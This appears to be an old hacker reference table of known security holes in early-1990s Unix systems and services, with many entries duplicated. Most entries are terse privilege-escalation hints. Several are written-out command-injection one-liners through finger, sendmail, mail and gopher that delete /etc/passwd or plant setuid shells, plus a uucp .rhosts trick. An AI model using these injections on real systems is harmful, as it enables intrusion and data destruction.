KNOW HOLES AND BUGS IN SERVER SYSTEMS

Operating System RVP Date Description (References)

================ === ======== ================================================

/bin/sh 1-- 12/12/94 IFS hole, vi ()

/bin/su 1-- overwrite stack somehow? ()

/dev/fb 1-- frame buffer devices readable/writeable, ()

/dev/kmem 1-- /dev/kmem shold not be o+w ()

/dev/mem 1-- /dev/mem shold not be o+w ()

/dev/*st*, *mt* 1-- generally world readable/writeable ()

/etc 1-- rexd + MACH ? [NeXT] /etc/ g+w daemon ()

4.3 Tahoe 1-- chfn -- allows newlines/meta chars/bufsize ()

4.3 Tahoe 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:got pw ()

AIX ? 5++ setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()

AIX 2.2.1 1-- shadow password file o+w ()

AIX 3.1.5 5-- sendmail- mail to programs ()

AIX 3.2 5-- sendmail- mail to programs ()

AIX 3.2.4 5-- sendmail- mail to programs ()

AIX 3.2.5 5-- sendmail- mail to programs ()

AIX ? 1-- * password means use root's password? ()

AIX ? 1-- rexd- any can get root access if enabled ()

Amdahl UTS 2.0 1-- NFS mountd only uses hostname ()

AT&T SVR3.2.0 1-- Bad protected mode allows root if have sh + cc ()

A/UX 2.0.1 5-- lpr -s; 1000 calls lpr re-use fname ()

A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()

A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()

BellTech SYSV386 1-- ulimit 0; passwd ==> zero's out passwd file ()

BSD 4.1 1-- Sendmail can mail directly to a file

BSD 4.1 1-- can mail directly to a file

BSD 4.1 1-- run set gid program, dump core, is set gid

BSD 4.1 1-- lock- compiled password "hasta la vista", + ^Z ()

BSD <4.2? 1-- IFS w. preserve bug in vi ()

BSD 4.1 1-- mail directly to a file ()

BSD 4.1 1-- exec sgid program, dump core, core is sgid ()

BSD 4.1 1-- Sendmail: can mail directly to a file ()

BSD 4.1 1-- lock password "hasta la vista" backdoor ()

BSD <4.2 1-- IFS w/ preserve bug w/vi ()

BSD <4.2 1-- suspend mkdir, ln file you want to dir ()

BSD <4.2? 1-- suspend mkdir, ln file you want to dir ()

BSD 4.2 1-- lock -- compiled in password "hasta la vista" ()

BSD 4.2 1-- ln passwd file to mail spool, mail to file ()

BSD 4.2 1-- can truncate read only files ()

BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()

BSD 4.2 1-- ln -s target ~/.plan; finger user to read file ()

BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()

BSD 4.2 1-- adb su; change check in memory; shell out ()

BSD 4.2 1-- race condition, can get root via "at" ()

BSD 4.2 1-- lock -- compiled in password "hasta la vista"

BSD 4.2 1-- ln passwd file to mail spool, mail user ()

BSD 4.2 1-- can truncate read only files ()

BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()

BSD 4.2 1-- ln -s target ~/.plan; finger user. ()

BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()

BSD 4.2 1-- adb su; change check in memory; shell out; su ()

BSD 4.2 1-- race condition, can get root via "at" ()

BSD 4.2 1-- /dev/kmem and /dev/mem should not be o+w ()

BSD 4.2 1-- signal any process by changing process group ()

BSD 4.3 1-- ftp -n; quote user ftp; ect. Gets root privs. ()

BSD 4.3 1-- lpd can overwrite file ()

BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell. ()

BSD 4.3 1-- fchown (2) can chown _any_ file ()

BSD 4.3 1-- race condition, get root via "at" ()

BSD 4.3 1-- passwd chokes on long lines, splits pw file ()

BSD 4.3 1-- ftp -n; quote user ftp; cd ~root, get root ()

BSD 4.3 1-- lpd can overwrite file ()

BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell ()

BSD 4.3 1-- fchown (2) can chown _any_ file ()

BSD 4.3 1-- race condition (expreserve?), root via "at" ()

BSD 4.3 1-- passwd chokes on long lines, splits pw file ()

BSD 4.3 5-- lpr -s; 1000 calls lpr re-use fname ()

BSD NET/2 5-- rdist(1) uses popen(3), IFS spoof ()

BSD NET/2 5-- lpr -s; 1000 calls lpr re-use fname ()

BSD ? 1-- Overwrite gets buffer -- fingerd, etc

BSD ? 1-- uudecode alias can overwrite root/daemon files ()

BSD ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()

BSD ? 1-- rwall bug ()

BSD ? 1-- adb the running kernel, shell out and get root ()

BSD ? 1-- sendmail can mail non-root file, try twice ()

BSD ? 1-- rshd -- spoof via nameservice, rsh target -l uid

BSD386 1-- mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()

buffer overrun 1-- chfn ()

chfn, chsh 1-- used to create a root account ()

chmod 1-- Incorrect file or directory permissions ()

comsat 1-- running as root, utmp o+w, writes to files ()

core 1-- will system dump a setgid core image? ()

decode 1-- decode mail alias - write non-root user files ()

DellSVR3.2/1.0.6 1-- Bad prot mode allows root if have sh + cc ()

denial 1-- easy to hog processor, memory, disc, tty, etc ()

DomainO/S <=10.3 1-- break root by using s/rbak; sgid/suid ()

DomainO/S <=10.4 5-- sendmail mail to programs ()

DNS 1-- SOA can control bogus reverse ip, rhosts ()

Domain/OS <10.3 1-- break root by using s/rbak; setgid/uid ()

DYNIX 3.0.14 1-- Sendmail -C file ==> displays any file. ()

DYNIX 3.? 1-- can get root on NFS host via root via mountd ()

DYNIX 3.? 1-- on non-trusted host due to bug in mount daemon ()

DYNIX ? 1-- rsh <host> -l "" <command> runs as root ()

DYNIX ? 1-- login: -r hostname

ruser^@luser^@term^@ ()

elm 5-- ELM's autoreply can be used to get root ()

expreserve 1-- can be a huge hole ()

ESIX Rev. D 1-- Bad protected mode allows root if sh+cc ()

file mod test 1-- test file doesnt lose the suid when modified ()

fsck 1-- lost+found should be mode 700 ()

ftpd 1-- static passwd struct overwrite, wuftp < x.xx ()

ftpd 4.2 1-- userid not reset properly, "user root" ()

ftpd ? 1-- core files may contain password info ()

fchown 1-- test for bad group test ()

ftruncate 1-- can be used to change major/minor on devices ()

fingerd 1-- .plan hard-links - read files, fingerd ()

gopher 6-- Type=8 Name=shell Host=;/bin/sh Port= Path= ()

gnuemacs 1-- emacsclient/server allows access to files. ()

GN <1.19 4+- exec0::/path/prog?var=blah%0Ahack-coomands0%A ()

HDB 1-- nostrangers shell escape ()

HDB 1-- changing the owner of set uid/gid files ()

HDB 1-- meta escapes on the X command line ()

HDB 1-- ; breaks on the X line ()

hosts.equiv 1-- default + entry ()

hosts.equiv 1-- easy to spoof by bad SOA at remote site ()

HPUX <7.0 1-- chfn -- allows newlines, etc ()

HP-UX 1-- sendmail: mail directly to programs ()

HPUX A.09.01 1-- sendmail: mail directly to programs ()

HPUX ? 1-- Sendmail: versions 1.2&13.1 sm, -oQ > ()

IDA 1.4.4.1 1-- :include:/some/unreadable/file in ~/.forward ()

ICMP 4-- various icmp attacks possible ()

ICMP 1-- ICMP redirect packets change non-static routes ()

Interactive 2.x 1-- Bad protected mode allows root if sh+cc ()

IRIX 3.3 1-- any user can read any other user's mail. ()

IRIX 3.3.1 1-- any user can read any other user's mail. ()

IRIX 3.3/3.31 1-- sendmail- any user can read other user's mail ()

IRIX 4.0.X 1-- default suid scripts ()

IRIX 4.0.X 1-- various $PATH problems ()

IRIX 4.0.X 1-- sendmail race condition hole ()

IRIX 4.0.X 1-- lpd are vulnerable too ()

IRIX ? 1-- rsh <host> -l "" <command> runs as root ()

IRIX ? 1-- login: -r hostname

ruser^@luser^@term^@ ()

IRIX ? 1-- login: -r hostname

ruser^@luser^@term^@ ()

IRIX ? 1-- Overwrite gets buffer -- fingerd, etc ()

IRIX ? 1-- uudecode alias can overwrite root/daemon files ()

IRIX ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()

IRIX ? 1-- rwall bug ()

IRIX ? 1-- adb the running kernel, shell out and get root ()

IRIX ? 1-- mail to any non-root owned file, try twice ()

IRIX ? 1-- rshd- spoof via dns - rsh target -l uid ()

IRIX ? 1-- xwsh log hole? (yo)

kernel 1-- Race conditions coupled with suid programs ()

lock 1-- 4.1bsd version had password "hasta la vista" ()

lost+found 1-- lost+found should be mode 700 ()

lpd 1-- overwrite files with root authority ()

lpr 1-- lpr -r access testing problem ()

lpr 5-- lpr -s; 1000 calls lpr re-use fname ()

lprm 1-- trusts utmp ()

mount 1-- "mount" should not be +x for users. ()

mqueue 1-- must not be mode 777! ()

movemail 1-- worm? ()

Microport 3.0 1-- ulimit 0; passwd ==> zero's out passwd file ()

network 1-- BSD network security based on "reserved ports" ()

news 1-- news receivers may execute shell commands ()

network 1-- kerberos ()

network 1-- Networks are usually very insecure. ()

NFS 1-- Many systems can be compromised with NFS/RPC. ()

NFS 1-- proxy rpc can read remote nfs files ()

NFS 1-- can generate NFS file handles ()

OSF/1 1.2 1-- write allows shell outs to gain egid term ()

OSF/1 1.3 1-- write allows shell outs to gain egid term ()

OSF/1 1.2 1-- doesn't close the fd to the term writing to ()

OSF/1 1.3 1-- doesn't close the fd to the term writing to ()

passwd 1-- fgets allows entries mangled into ::0:0::: ()

passwd 1-- fred:...:...:...:Fred ....Flintstone::/bin/sh ()

passwd 1-- IDs shouldnt contain: ;~!` M- spoof popen ()

portmap 1-- binding problems... ()

root 1-- ? (fingerd_test.sh)

rcp 1-- nobody problem ()

rexd 1-- existence ()

rexd 1-- MACH ? [NeXT] /etc/ g+w daemon ()

rdist 1-- buffer overflow ()

rdist 5-- rdist(1) uses popen(3), IFS spoof ()

RISC/os 4.51? 1-- rsh <host> -l "" <command> runs as root ()

RPC 1-- Many systems can be compromised with NFS/RPC. ()

rwall 1-- running as root, utmp o+w , writes to files ()

SCO 3.2v4.2 5-- rdist(1) uses popen(3), IFS spoof ()

SCO ? 1-- rlogin to any acct to trusted host w/o pwd ()

SCO ? 1-- rlogin to any acct from trusted host w/o pwd ()

selection_svc 1-- allowed remote access to files ()

sendmail <x.x 1-- -bt -C/usr/spool/mail/user - reads file ()

sendmail <5.57 1-- from:<"|/bin/rm /etc/passwd"> && bounce mail ()

sendmail <=5.61 1-- can mail to any file not root owned, try twice ()

sendmail <5.61 1-- sendmail- groups incorrectly, get group ()

sendmail >5.65 1-- can get daemon privalages via .forward. ()

sendmail ? 5++ can mail to programs (sendmal1, nmh, smail)

sendmail ? 1-- debug option ()

sendmail ? 1-- wizard mode ()

sendmail ? 1-- TURN command allows mail to be stolen ()

sendmail ? 1-- decode mail alias - write non-root user files ()

sendmail ? 1-- buffer overflow cause sendmail deamon lock up ()

sendmail ? 1-- what uid does |program run with? ()

SIGNALS 1-- signal any process by changing process group ()

Stellix 2.0? 1-- rsh <host> -l "" <command> runs as root ()

Stellix 2.0 1-- rsh <host> -l "" <command> runs as root ()

Stellix 2.1 1-- login: -r hostname

ruser^@luser^@term^@ ()

suid 1-- will run .profile if linked to - , IFS ()

suid 1-- never call system(3) and popen(3) ()

suid 1-- May not expect filesize signals, SIGALRMs ()

suid 1-- no setuid program on a mountable disk ()

suid 1-- ro mounting of foreign disk may allow suid. ()

suid 1-- .plan links ()

suid 1-- /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()

SunOS 3.3 1-- ftpd - userid not reset properly, "user root" ()

SunOS 3.5 1-- connect w/acct;user root;ls;put /tmp/f/ tmp/b ()

SunOS <4.0 1-- any user can run yp server ()

SunOS 4.0 1-- chsh -- similar to chfn ()

SunOS 386i 1-- rm logintool, hack login with adb, chmod 2750 ()

SunOS 386i/4.01? 1-- login -n root requires no password ()

SunOS 386i/4.01? 1-- login -n root (no password) ()

SunOS 4.0.1 1-- chfn buffer problems ()

SunOS 4.0.1 1-- chsh buffer problems ()

SunOS 4.0.1 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()

SunOS 4.0.3 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()

SunOS 4.0.3 1-- concurrent yppasswd sessions can trash yp map ()

SunOS 4.0.3 1-- mail to any non-root owned file, try twice ()

SunOS 4.0.3 1-- rcp buffer overflow ()

SunOS 4.0.3 1-- sendmail- mail to non-root file, try twice ()

SunOS 4.0.3 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW ()

SunOS 4.0.3 1-- uucico can show ph num, login, passwd, on remote machine ()

SunOS 4.0.3 1-- ypserv sends maps to anyone w/ domain (ypsnarf)

SunOS 4.0.? 1-- anyone can restore a file over any other file. ()

SunOS 4.0.? 1-- chfn -- allows newlines, meta chars, bufsize problem. ()

SunOS 4.0.? 1-- rcp with uid -2; only from PC/NFS. ()

SunOS 4.0.? 1-- ln -s /any/suid/file -i ; -i ()

SunOS 4.0.? 1-- selection_svc can remotely grab files. ()

SunOS 4.1 1-- rshd: spoof via nameservice, rsh target -l uid ()

SunOS 4.1 1-- shared libs accept relative paths w/ suid ()

SunOS 4.1 1-- sendmail: groups incorrectly checked, can get any group ()

SunOS 4.1 1-- comsat can overwrite any file ()

SunOS 4.1.x 1-- comsat can overwrite any file ()

SunOS 4.1.x 1-- ptrace allows to become root ()

SunOS 4.1.x 1-- openlook: telnet 2000; executive,x3, run ps int ()

SunOS <4.1.1 5-- lpr -s; 1000 calls lpr re-use fname ()

SunOS 4.1.2 5-- rdist(1) uses popen(3), IFS spoof ()

SunOS ? 1-- /usr/kvm/crash allows sh escapes group kmem ()

SunOS ? 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW()

SunOS ? 1-- /dev/kmem and /dev/mem should not be o+w ()

SunOS ? 1-- rshd -- spoof via nameservice, rsh target -l uid

SunOS ? 1-- ftp -n; quote user ftp; ect. Gets root privs. ()

SunOS ? 1-- symlink .plan to target file, finger user to read. ()

SunOS ? 1-- Overwrite gets buffer -- fingerd, etc. (3.5)

SunOS ? 1-- rwall bug (<= 4.01 yes). ()

SunOS ? 1-- ptrace allows to become root ()

SunOS ? 4-- icmp errors not handled correctly ()

SunOS ? 1-- adb the running kernel, shell out and get root ()

SunOS ? 1-- ftp -n; quote user ftp; ect Gets root privs ()

SunOS ? 1-- lpd can overwrite file ()

SunOS ? 1-- the window manager can be used to read any file ()

SunOS ? 1-- rexd -- any can get root access if enabled ()

SunOS ? 1-- emacsclient/server allows access to files ()

SunOS ? 1-- openlook; telnet port 2000; executive,x3, runs PS interp

SunUS ? 1-- devinfo can be used to get group kmem ()

SunOS 5.1 1-- Symlinks are broken ()

syslogd 6-- buffer overrun, allows remote access ()

syslogd 1-- syslog messages used to overwrite any file ()

system 1-- system(3) even w/ setuid(getuid()) = IFS ()

SYSV <R4 1-- write to files; race condition w/ mkdir & ln ()

SYSV <R4 1-- expreserve problem/race condition ()

SYSV R? 1-- IFS, other environment at "login:" prompt ()

tcp/ip 1-- sequence number prediction allows spoofing ()

tcp/ip 1-- source routing make host spoofing easier ()

tcp/ip 1-- rip allows one to capture traffic more easily ()

tcp/ip 4-- various icmp attacks possible ()

tftp 1-- puts/gets -- grab files, do chroot ()

traceroute 1-- allow one to easily dump packets onto net ()

ulimit 1-- passwd(1) leaves passwd locked if ulimit set ()

Ultrix 2.0? 1-- sendmail- 1.2&13.1 sm, -oQ > can r/w any ()

Ultrix 2.0? 1-- Sendmail -C file ==> displays any file. ()

Ultrix 2.2? 1-- Sendmail -C file ==> displays any file. ()

Ultrix 2.2 1-- ln passwd file to mail spool, mail to user ()

Ultrix 2.2 1-- on a non-trusted host due to bug in mountd ()

Ultrix 2.2 1-- Sendmail: -C file ==> displays any file ()

Ultrix 2.2 1-- can get root on NFS host via root via mountd ()

Ultrix 2.2 1-- get root on host running NFS from other root ()

Ultrix 3.0 1-- lock -- compiled in password "hasta la vista" ()

Ultrix 3.0 1-- login -P progname allows run programs as root ()

Ultrix 3.0 1-- login can run any program with root privs ()

Ultrix 3.0 1-- ln -s target ~/.plan; finger user to access ()

Ultrix 3.0 1-- any user can mount any filesystem ()

Ultrix 3.0 1-- X11 doesn't clear pwds in mem; /dev/mem is o+w ()

Ultrix <3.1 1-- limit file 0; passwd -->zero's out passwd file ()

Ultrix <3.1 1-- lpd can overwrite any file (back to 2.0?) ()

Ultrix 3.1? 1-- rshd: spoof via nameservice, rsh target -l uid ()

Ultrix 3.1? 1-- allows newlines, meta chars, buffsize problem ()

Ultrix <4.1 1-- overflow RISC reg buffer, get root w/ mail ()

Ultrix ? 1-- rshd -- spoof via dns, rsh target -l uid ()

Ultrix ? 1-- ypbind takes ypset from all; spoof yp DB ()

Ultrix ? 1-- yppasswd leaves yp data files world writable ()

Ultrix ? 1-- chfn -- allows newlines, meta chars, bufsize ()

Ultrix ? 1-- ftp -n; quote user ftp; ect Gets root privs ()

Ultrix ? 1-- can change host name, mount any filesystem ()

Ultrix ? 1-- uudecode alias can overwrite root/daemon files ()

Ultrix ? 4-- ICMP not handled correctly (nuke)

Ultrix ? 1-- emacsclient/server allows access to files ()

Ultrix ? 1-- lock: password "hasta la vista" backdoor ()

Ultrix ? 1-- /dev/kmem and /dev/mem should not be o+w ()

Ultrix ? 1-- can change physical ethernet address ()

UNIX 1-- / must not be go+w ()

utmp 1-- etc/utmp o+w ? ()

utmp 1-- check to see if world writeable (rwall, comsat)

utmp 1-- syslog messages can overwrite any file ()

uucp 1-- check valid UUCP akts in the /etc/ftpusers ()

uucp 1-- echo "myhost myname">x;uucp x ~uucp/.rhosts ()

uucp 1-- uucico shows ph num, login, passwd, of remote ()

uudecode 1-- if it is setuid, may create setuid files ()

uusend 1-- uusend may call "uux" while suid to root ()

uux 1-- uusend may call "uux" while suid to root ()

X11R? 1-- snoop on keyboards and bitmaps ()

X11R3 1-- can set log on and exec (fixed in "fix-6")

X11R4 1-- can set log on and exec (fixed in "fix-6")

X11R ? 1-- snoop on keyboards and bitmaps ()

X11R5 5++ xterm can create files (xterm1__)

xhost 1-- if + , anyone can connect to X server ()

ypbind 1-- accepts ypset from anyone ()